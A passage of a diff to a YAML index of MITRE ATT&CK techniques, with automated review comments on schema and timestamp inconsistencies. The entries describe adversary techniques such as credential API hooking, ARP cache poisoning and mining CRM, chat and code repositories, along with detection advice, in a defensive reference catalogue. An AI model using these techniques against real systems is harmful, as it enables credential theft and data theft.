- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
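Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM, root, User) is removed from T1056 here, yet the same key is still present as unchanged context for T1602.001 later in this patch (`x_mitre_permissions_required:` / `- Administrator`), so after this change the index carries the key on some entries and not on others. That looks like an upstream change applied only to re-published objects, which is fine to mirror, but anything that reads `x_mitre_permissions_required` from this index must treat it as optional instead of assuming every technique has it.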
@@ -41231,9 +41778,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
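Review bot: the new T1213.004 entry is added with `x_mitre_detection: ''`, and the new T1213.005 entry in the last hunk has the same empty string; if anything renders the detection field from this index, confirm that an empty value yields a blank section rather than an error or a literal nil. Note also that T1213.004 ends at `atomic_tests: []` without an `identifier` key, whereas the T1056.004 entry later in the patch carries `identifier: T1056.004`, so the newly added techniques follow the inconsistent pattern already present in the file.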
@@ -41279,7 +41877,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
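Review bot: `modified` for T1557.002 moves backward, from '2022-11-08T14:00:00.188Z' to '2022-07-22T18:37:22.176Z', and the T1602.001 hunk further down does the same ('2021-04-29T14:49:39.188Z' to '2020-10-22T01:54:22.812Z'). A regeneration should not make an object older; several of the removed timestamps share the `14:00:00.188Z` suffix, which suggests a bulk stamp, so the most likely explanation is that the STIX source this index is now built from differs from the one used before. Confirm the new source is the intended one, and that nothing downstream compares `modified` values to decide whether an entry has changed.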
@@ -41298,37 +41896,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
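Review bot: the T1213.003 block in this hunk removes `x_mitre_platforms`, `x_mitre_is_subtechnique`, `x_mitre_deprecated`, `x_mitre_version` and `x_mitre_contributors` only to re-add the same keys with identical values (apart from the version bump from 1.1 to 1.2) in a different order, and the T1056.004 `external_references` list in the last hunk is reshuffled the same way. The only substantive changes here are that version bump and the `[Unsecured Credentials]` link added to the description. Since the index evidently mirrors upstream key order, consider having the generator sort mapping keys (and reference lists by `source_name`) before writing, so future regenerations produce diffs that show only real changes.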
@@ -41351,41 +41948,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
@@ -41414,10 +42022,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -41430,10 +42037,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
@@ -41442,11 +42059,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
@@ -41483,7 +42103,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
@@ -41515,115 +42135,182 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-08-27T21:03:56.385Z'
+ name: 'Input Capture: Credential API Hooking'
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Metadata'
+ - 'Process: OS API Execution'
type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
created: '2020-02-11T19:01:15.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1056.004
url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
- source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
Retrieved December 18, 2017.
url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Hook Overview
description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
description: Stack Exchange - Security. (2012, July 31). What are the methods
to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
- name: 'Input Capture: Credential API Hooking'
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1056.004
+ atomic_tests: []
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- - 'Process: Process Metadata'
- - 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- identifier: T1056.004
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
